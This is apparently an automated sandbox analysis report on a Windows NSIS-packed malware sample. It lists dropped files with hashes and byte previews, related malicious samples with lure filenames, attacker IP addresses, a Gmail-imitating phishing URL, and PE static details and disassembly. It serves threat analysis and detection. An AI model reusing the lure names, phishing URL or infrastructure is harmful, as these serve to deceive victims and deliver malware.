Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ecs.office.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:22:08	API Interceptor	4044x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	remcos.exe	Get hash	malicious	Browse	91.193.75.214
	luthor.js	Get hash	malicious	Browse	91.193.75.214
	PO. AND FULL COMPANY DETAILS.js	Get hash	malicious	Browse	91.193.75.135
	file.exe	Get hash	malicious	Browse	91.193.75.134
	file.exe	Get hash	malicious	Browse	91.193.75.134
	mona.lerioprovantageOrder25-10-2022.scr.exe	Get hash	malicious	Browse	91.193.75.178
	PShipDocu.js	Get hash	malicious	Browse	91.193.75.231
	ModifiedBL-pdf.js	Get hash	malicious	Browse	91.193.75.231
	ShippingDocuments.js	Get hash	malicious	Browse	91.193.75.231
	DHL Shipment Notification(BL,INV and PL)215158433805.vbs	Get hash	malicious	Browse	91.193.75.162
	uRAPDqVlzq_wynmove.js	Get hash	malicious	Browse	91.193.75.231
	tjpifARFyB_wynwormi.js	Get hash	malicious	Browse	91.193.75.231
	GwpdKgFDRG_wynmove.js	Get hash	malicious	Browse	91.193.75.231
	SecuriteInfo.com.Variant.Barys.34076.23160.31198.exe	Get hash	malicious	Browse	91.193.75.227
	ACH USD Telex Confirmation_REF20221910H923Y.xls	Get hash	malicious	Browse	91.193.75.137
	PURCHASE INQUIRY.js	Get hash	malicious	Browse	91.193.75.231
	qubuIErGAEwynwormi.js	Get hash	malicious	Browse	91.193.75.231
	Order_CIQ1154500.js	Get hash	malicious	Browse	91.193.75.231
	New Order Inquiry.jar	Get hash	malicious	Browse	91.193.75.231
	https://drive.google.com/file/d/1g5pvgsYoytfqXZtiKKvQrWx42VQyK1Gf/view?usp=drive_web	Get hash	malicious	Browse	91.193.75.212

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	http://noticiasalcaldianeiva.gov.co/	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	WWW9 (2) (3).exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	RFQ# 6000163267.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	Q4 code of conduct.html	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	https://gmail.net-login.com/XZWxWc01IcGhSMFp5ZFVsVFJqQmtkakJuYUdOdE9GSmhObXB2T0RWSVducGtaR1pTWVdveE5tZzVhWFZLVXpWVVpIVllkV0ZWVVhKU1MwbEJjMVZKT1VseWMybHpRakZ1T0VGSVJWSTVOMGQ1TVZKV2FtTnhXRVJaYXpFNFVYVkNhRVJpUldkRk9TdG5RMkV4ZFdkTFNHZzJZMjFVU1ZSM01rTXZUVk5ZVkVFelZXZzJiMDgyY0RaRUwzWTNVMU0wWlhaYU4wVkNhVU5WYUVwamJFMHhPVWhJV2tkeFVWSlNVV0kwUFMwdE5uSmpaa2xVVUc1VlMyTjVNR3hUVFZOUVdFUTNRVDA5LS02OWZlMzE1MjgxZWIxOThiNmIwMmUxOWJmMzY3NDg0YjEwMDBmM2Nm?cid=1356791256	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	A3EA2B7A7073F721CB405A5804B8D320CCE61172AFA3E.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	file.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193
	WELTER zahnrad GmbH Urgent enquiry Order nr543.exe	Get hash	malicious	Browse	142.250.186.78 172.217.16.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe	SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Get hash	malicious	Browse
	s9kIU8A6sJ.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll	SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe	Get hash	malicious	Browse
	Scombrid.exe	Get hash	malicious	Browse
	Buffone.exe	Get hash	malicious	Browse
	Conferring.exe	Get hash	malicious	Browse
	Scombrid.exe	Get hash	malicious	Browse
	Buffone.exe	Get hash	malicious	Browse
	Conferring.exe	Get hash	malicious	Browse
	Sdladnes.exe	Get hash	malicious	Browse
	Ichthyologic.exe	Get hash	malicious	Browse
	Fuliginousness.exe	Get hash	malicious	Browse
	Ichthyologic.exe	Get hash	malicious	Browse
	Fuliginousness.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.Outbreak.7132.1329.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.Outbreak.7132.1329.exe	Get hash	malicious	Browse
	Documento contrattuale 22201008 Spec22201009.exe	Get hash	malicious	Browse
	Documento contrattuale 22201008 Spec22201009.exe	Get hash	malicious	Browse
	NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe	Get hash	malicious	Browse
	NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne\Hjernearbejder.Mes

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
File Type:	data
Category:	dropped
Size (bytes):	29009
Entropy (8bit):	7.992971996572874
Encrypted:	true
SSDEEP:	768:NTG4pBCkWRRNsNBaAYbI3dQT/tJWqX7THfFO4PaSmUZeNue11f:NS4pBbWRR6NBa9E3dI/WqrbFLPa2U31N
MD5:	3165628E559E4C71AD58389A882A44C7
SHA1:	65DB3BC9931B59BAB3B49BC0A383873D9503EAD2
SHA-256:	E6F69E5ED26145EB0B9AD53FF02752578D16A1D6E340ED9B341132EFBEFF9A34
SHA-512:	CBE8C725E73CBD7819483B094824861533CC2338CEA3B25674D03C00D8F153716C5920E8E8A88192C8808F9FC16672D1674672397C541866827E3BC30083E1DF
Malicious:	false
Reputation:	low
Preview:	.XN._l..h..1K.6C..8.m\|../....g7....4NmS.d....O..3Z8...;C_.).v....u......Jp..nR........@.4.Y\|.LI.t.=...<./..XV..P"\|Mj%T2{?g.F...i.M,Z[...........f7^...u#..`..C.U]...y2.j..3...2D.....=...4....[q......g.ZI0RiM.P...Zd.9kma.....1j..'.?"...D.u...[1..2......M..uL.B.B.?.F...g.y.P.......hZB.m.......[i.=i....%.t.-..........^cP..K^.....A#.T4..UY.S9.C...#K..;S...C.8Sj.\W....9.z.....R..D.xa}...m...(....e.^....l"..{^+ ..+.%...NxK..,8{.^.=.a..r..02..S.$..^......J5[...0PU..`.)...!E....I...O.=....,...H...E...S.A.T%.K...H...f......24....P..x.....-.w.....,y.x.W..nW..G.....6$...t.@......T...W..$@..o/.M.pB.D{.}&..-S.\...iQt..4.A...a ...G.4......j.Z..h$.gQJ..}. ...k.(.:4....-....RZ..k\|1 5.U..W.i8......OQe.......R3.....01.@....-nF.....g..g.....6[...#.AG.blm...b......:.7.;..Y.RS..Z......._.Z.].-`@[x...;g.RiJe...Zd.~.......Ah.TP..]..`hG...$U\u9.h.:..9..,...m...i$.tB.....;rY..w.......}K..):.=.<..*...f....o.`RDT.X..x.a6...7c,.&.L....0..P<B.G.s.]$.2.i ..s:.d..M,-=qh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne\input-mouse-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	4.771334618443714
Encrypted:	false
SSDEEP:	24:t4Col+1ecdmaT7C7vPHqouTMT3X+E744AeWrGMwU0CICx:QcdmaT7C7nqoqg3uE744Ae3MwUNx
MD5:	6ABC1ECB25C92CFDB963EA764BA01B00
SHA1:	2DD0D27B47EE7C77D4FFF4BA069804666214C462
SHA-256:	6F263C116AEB1C8B9CC2B58CB717087C08D3D70D7B4F39A79BE108DC454385F5
SHA-512:	C9457DCC24D6AAB73C2F813CEE9218777813CDEE438790ACBBAAD7CCDB04538045E3CE78762F2200CE390396534E3E9D5E668148A1EA961E21006E3465BA1735
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16.009"><g fill="#2e3436"><path d="M8.062.01c-.454.049-.883.22-1.25.5C6.324.88 6 1.463 6 2.196a.52.52 0 00.5.507.52.52 0 00.5-.507c0-.45.172-.704.437-.907.266-.202.664-.3 1.063-.28.399.018.784.153 1.062.405.279.253.47.585.47 1.125 0 2.166 1.463 3.51 3 3.47.856-.023 1.687-.478 2.25-1.313l-.563-1c-.376.915-1.068 1.295-1.719 1.312-.96.025-1.969-.73-1.969-2.469 0-.792-.337-1.443-.812-1.875C9.743.235 9.138.038 8.53.01c-.151-.007-.317-.016-.469 0zM15 1.977v.156l.781 1.375c.012-.04.021-.083.031-.125zm0 .375c-.006.106-.02.214-.031.312l.719 1.22c.023-.063.041-.123.062-.188zm-.063.5c-.013.09-.044.166-.062.25l.656 1.125c.03-.061.067-.124.094-.188zm-.093.437c-.024.09-.066.17-.094.25l.594 1.032c.04-.066.088-.119.125-.188z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" color="#000" font-weight="400" font-family="Sans" overflow="visible"/><

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	409720
Entropy (8bit):	6.608973549518863
Encrypted:	false
SSDEEP:	12288:DTWCBabqAS+XjHeOudiXDfoSzc52jHLiinD0XbFITkk:uRvS+XjHFudyPHf0Xbmok
MD5:	20AE886E07C3A21B187823EF2367E5FC
SHA1:	8E217654DB7EBD99040EEB5387E0EE1A03DEE4F1
SHA-256:	AD4485A9D7A7DE8A78B183B820E932E44DBFF11AF7D584005351878E35146458
SHA-512:	ECC1C4588E5DD4004712D9F6AEAC1CBFB2BFA5258899878878AB9C47676D9306A4FD4D92E8594B7DCB7F07A65673923144992C3618979F69146755CA02E13F73
Malicious:	false
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 3%, Browse
Joe Sandbox View:	Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Detection: malicious, Browse Filename: s9kIU8A6sJ.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................R...........f.......p....@..............................................@...............................&.......2...........(..x.... ...X..................................................H................................text....I.......J.................. ..`.itext.......`.......N.............. ..`.data...4....p.......V..............@....bss.....5...........r...................idata...&.......(...r..............@....tls....4................................rdata..............................@..@.reloc...X... ...Z..................@..B.rsrc....2.......2..................@..@.....................(..............@..@................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Systemkvaliteternes.Jug

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
File Type:	data
Category:	dropped
Size (bytes):	154398
Entropy (8bit):	7.20503336878212
Encrypted:	false
SSDEEP:	3072:js12w2Uq479uSd9iXb8FERFfW3093Qre84GFkRMG4vihP:02w27Ku+iwy9Ytur4vsP
MD5:	1E6F0B6A7479BC35ABB19BEC8A6C66FF
SHA1:	F85A912925B345EF073A6E6BDBAD5099FC777F79
SHA-256:	A5029F422FEA64C4C7DF6ACC6EF04AAB4D93E5C72C1572B8FDD9621278532E03
SHA-512:	8C7D29BD13B3AC980AF4D9841F667D157A1F7EFFA7CBAE164CE867A87D5C1EA05A2558864D595ACD57B4594ED02211942188371C21C09B86129551905513BCD6
Malicious:	false
Preview:	N..(O.E..{.....2.4nYci.....#...h.a..".(...V.........Q.9...3.#..d..d.i,....x..W.-...9../.....N...b.......Hp.ct........................................................................t..-.N.V.........................................f=........7Sa.&___________________________________________________.z..Of...f.n..;...h.......................................................f..!..`....5"..U5555555555555555555555555555555555555555555555555f.......)g3?Z#####################################...]K..o..a..B.Q5.................................................................f......&.p.N........................................."Z..&................................h.....f.k..%........................................f.......Af:.m.............................................................f..R...f.i..3\\.\....................................................f....n..?NY..............................................................f.......!.........................................L...7$$$$$$$$$$$$$$$$$$

C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse Antivirus: Metadefender, Detection: 4%, Browse
Joe Sandbox View:	Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.13387.27803.28025.exe, Detection: malicious, Browse Filename: Scombrid.exe, Detection: malicious, Browse Filename: Buffone.exe, Detection: malicious, Browse Filename: Conferring.exe, Detection: malicious, Browse Filename: Scombrid.exe, Detection: malicious, Browse Filename: Buffone.exe, Detection: malicious, Browse Filename: Conferring.exe, Detection: malicious, Browse Filename: Sdladnes.exe, Detection: malicious, Browse Filename: Ichthyologic.exe, Detection: malicious, Browse Filename: Fuliginousness.exe, Detection: malicious, Browse Filename: Ichthyologic.exe, Detection: malicious, Browse Filename: Fuliginousness.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Outbreak.7132.1329.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Outbreak.7132.1329.exe, Detection: malicious, Browse Filename: Documento contrattuale 22201008 Spec22201009.exe, Detection: malicious, Browse Filename: Documento contrattuale 22201008 Spec22201009.exe, Detection: malicious, Browse Filename: NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe, Detection: malicious, Browse Filename: NOVA EMAIL - EXPORT COUNTER 7 OCT 2022.pdf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	PGP Secret Sub-key -
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:0St:pt
MD5:	B9A99DD89B2B74FA3D0DB489A9441F60
SHA1:	D10A9398FC0186720F25C85406C9162F1AF53C27
SHA-256:	F107BEC012DA220E92554B8801535F7FA92C949C7E2DBB4E588B80F7A723466C
SHA-512:	22975136BDB95133318A25BDFC5AAB82EB592ACBE56B01418A2EBD0225E8933D89D7AD164153C2CB27DB32402021D2C3DFC81D9B1AE3F5ABDE629CAE203DE0FF
Malicious:	true
Preview:	.E..l..H

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Thow.lnk

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1648
Entropy (8bit):	3.085836381315963
Encrypted:	false
SSDEEP:	24:8i6/rWLgD4/BOmRCBecGlodQAC+eTv/8AdizZwa/kjJT:8ZCgDsvRCLGloPCLEKiNwswT
MD5:	394618606785FD3F683F7A6ADA540F44
SHA1:	5B60259981F74037841F4B5196D732AD0FF570AB
SHA-256:	3148C86B36AF9B4F40E97D7FAB519A883B07B3D9D55F619ED07E22B16233C266
SHA-512:	1ED6603DF13D09981A761CCDEADCAA514BC83683107FE2D6A814306FD973B52522C2160EE56AAE524DE32CDF83718CFC68564D0C2C836BEDFE7F8FE8CE5D6DD6
Malicious:	false
Preview:	L..................F........................................................7....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.....b.1...........Stripteased.H............................................S.t.r.i.p.t.e.a.s.e.d.....h.1...........Thysanopteron.L............................................T.h.y.s.a.n.o.p.t.e.r.o.n.....n.1...........Rektifikationen.P.................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.683733070429602
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
File size:	531480
MD5:	5f570885a22cf0a74ca454ea710bcd2e
SHA1:	82e8aa91a64dd2e0f1c18317518e9e2914387967
SHA256:	a1dbe6c38c03059bd197cde9e455e03875c32dd034cc6c229c4c62b2d1753eaf
SHA512:	0b5ab3698c43d3fe69375b5cd6c48853fc2069f693da1858eacba79db4afbae51624292b4acc311fe76f267e832dfc05062a5776a26f65c08590ae5138ef60b9
SSDEEP:	12288:tOHcKlaPVnLmr22GAsKK/tLOsQ/2V82BKZ70EHH:tgcKliVar22GCMtPymQH
TLSH:	8DB4F290FB91C4D2EDB503B85E77DCF129ABBD7D70B0420D224A39696AB3352106F94B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...6.uY.................f.........

File Icon


Icon Hash:	74e8c4ccdcccc0e8

Static PE Info

General

Entrypoint:	0x403373
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759536 [Mon Jul 24 06:35:34 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	OU="truts Femetagershuset Strangulerendes ", E=Placeringsmssigt@Aiders.Ba, O=Skvadre, L=Tullygally, S=Northern Ireland, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	02/11/2022 23:29:41 01/11/2025 23:29:41
Subject Chain	OU="truts Femetagershuset Strangulerendes ", E=Placeringsmssigt@Aiders.Ba, O=Skvadre, L=Tullygally, S=Northern Ireland, C=GB
Version:	3
Thumbprint MD5:	8D20C24B85839068FFE77A9B0E43442A
Thumbprint SHA-1:	510509682B2BB050F41F78498A1B87F673D0540D
Thumbprint SHA-256:	58D9F4474CF9AC7B148864CF2DC476F50AD1C3B094EC4A93D61BF46D8E2C617F
Serial:	FCD368E4C01BC4FC

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434EECh], eax
je 00007F32F432E0A3h
push ebx
call 00007F32F4331339h
cmp eax, ebx
je 00007F32F432E099h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F32F43312B3h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F32F432E07Ch
push 0000000Ah
call 00007F32F433130Ch
push 00000008h
call 00007F32F4331305h
push 00000006h
mov dword ptr [00434EE4h], eax
call 00007F32F43312F9h
cmp eax, ebx
je 00007F32F432E0A1h
push 0000001Eh
call eax
test eax, eax
je 00007F32F432E099h
or byte ptr [00434EEFh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [00434FB8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6b000	0x1c6f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x81508	0x710	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x65ef	0x6600	False	0.6750919117647058	data	6.514810500836391	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x149a	0x1600	False	0.43803267045454547	data	5.007075185851696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	False	0.5162760416666666	data	4.036693470004838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x36000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6b000	0x1c6f8	0x1c800	False	0.3971011513157895	data	5.769513251643276	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x6b2b0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States
RT_ICON	0x7bad8	0x7125	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x82c00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x851a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x86250	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x86bd8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x87040	0x120	data	English	United States
RT_DIALOG	0x87160	0xf8	data	English	United States
RT_DIALOG	0x87258	0xa0	data	English	United States
RT_DIALOG	0x872f8	0x60	data	English	United States
RT_GROUP_ICON	0x87358	0x5a	data	English	United States
RT_MANIFEST	0x873b8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
